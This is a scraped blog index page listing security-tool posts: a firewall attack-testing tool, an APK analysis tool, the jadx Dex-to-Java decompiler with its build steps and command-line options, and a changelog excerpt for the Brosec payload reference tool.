class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/20/penthefire-security-tool-implementing-attacks-test-the-resistance-of-firewall/" rel="bookmark">penthefire – Security tool implementing attacks to test the resistance of a firewall.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>LEGAL DISCLAIMER: The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal…</p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-48988" class="post-48988 post type-post status-publish format-standard hentry category-uncategorized tag-android tag-android-tools tag-anti-malware tag-apk-tools tag-code-scripting tag-decode tag-malware-analysis tag-security-tools"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/16/apkstat-automated-information-retrieval-from-apks-for-initial-analysis/" rel="bookmark">APKStat – Automated Information Retrieval From APKs For Initial Analysis.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>APKStat – Automated Information Retrieval From APKs For Initial Analysis. APKStat uses APK Tool to decompress and decode your APK file. APKStat will:…</p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-48546" class="post-48546 post type-post status-publish format-standard hentry category-uncategorized tag-android tag-decode tag-dex tag-jadx tag-java tag-java-decompiler tag-linux tag-mac tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/12/jadx-dex-to-java-decompiler/" rel="bookmark">jadx – Dex to Java Decompiler</a></h1> </header><!-- .entry-header --> <div class="entry-content">
<p>jadx – Dex to Java decompiler. Command line and GUI tools for producing Java source code from Android Dex and Apk files.</p>
<p>Building from source: <code>git clone</code> the jadx repository, then run <code>./gradlew dist</code> (on Windows, use <code>gradlew.bat</code> instead of <code>./gradlew</code>). Scripts for running jadx will be placed in <code>build/jadx/bin</code> and also packed into <code>build/jadx-&lt;version&gt;.zip</code>.</p>
<p>Run jadx on itself:</p>
<p><code>cd build/jadx/</code><br /> <code>bin/jadx -d out lib/jadx-core-*.jar</code><br /> <code># or</code><br /> <code>bin/jadx-gui lib/jadx-core-*.jar</code></p>
<p>Usage: <code>jadx[-gui] [options] &lt;input file&gt;</code> (.dex, .apk, .jar or .class)</p>
<p>Options:</p>
<ul> <li><code>-d, --output-dir</code> – output directory</li> <li><code>-j, --threads-count</code> – processing threads count</li> <li><code>-r, --no-res</code> – do not decode resources</li> <li><code>-s, --no-src</code> – do not decompile source code</li> <li><code>-e, --export-gradle</code> – save as Android Gradle project</li> <li><code>--show-bad-code</code> – show inconsistent code (incorrectly decompiled)</li> <li><code>--no-replace-consts</code> – don't replace constant values with the matching constant field</li> <li><code>--escape-unicode</code> – escape non-Latin characters in strings (with \u)</li> <li><code>--deobf</code> – activate deobfuscation</li> <li><code>--deobf-min</code> – minimum length of name</li> <li><code>--deobf-max</code> – maximum length of name</li> <li><code>--deobf-rewrite-cfg</code> – force saving of the deobfuscation map</li> <li><code>--deobf-use-sourcename</code> – use source file name as class name alias</li> <li><code>--cfg</code> – save methods' control flow graph to a dot file</li> <li><code>--raw-cfg</code> – save methods' control flow graph (using raw instructions)</li> <li><code>-f, --fallback</code> – make simple dump (using goto instead of 'if', 'for', etc.)</li> <li><code>-v, --verbose</code> – verbose output</li> <li><code>-h, --help</code> – print this help</li> </ul>
<p>Example: <code>jadx -d out classes.dex</code></p>
<p>Troubleshooting – out of memory error:</p>
<ul> <li>Reduce the processing threads count (<code>-j</code> option).</li> <li>Increase the maximum Java heap size, either on the command line (example for Linux): <code>JAVA_OPTS="-Xmx4G" jadx -j 1 some.apk</code>, or by editing the <code>jadx</code> script (<code>jadx.bat</code> on Windows) and setting a bigger heap size: <code>DEFAULT_JVM_OPTS="-Xmx2500M"</code></li> </ul>
<p>Contribution – to support this project you can:</p>
<ul> <li>Post thoughts about new features/optimizations that are important to you.</li> <li>Submit bugs using one of the following patterns: Java code examples which decompile incorrectly; an error log and a link to a publicly available apk file or app page on Google Play.</li> </ul>
<p>Download jadx</p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-40248" class="post-40248 post type-post status-publish format-standard hentry category-uncategorized tag-decode tag-encode tag-framework tag-node-js tag-payload tag-penetration-test tag-privilege-escalation tag-reverseshell tag-shellcode tag-testing-proxys"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/06/30/brosec-v1-3-0-3-an-interactive-reference-tool-to-help-security-professionals-utilize-useful-payload-commands/" rel="bookmark">Brosec v1.3.0.3 – An interactive reference tool to help security professionals utilize useful payloads & commands.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>changelog brosec v1.3.0.3 (June 30, 2017): * Minor Fix & Enhancement + Added new payloads to wmic (bros 34) + Added netsh proxy command to…</p> </div><!-- .entry-content --> </div> 
</article><!-- #post-## --> </main><!-- #main --> </div><!-- #primary --> </div><!-- #content --> </div><!-- #page --> </body> </html>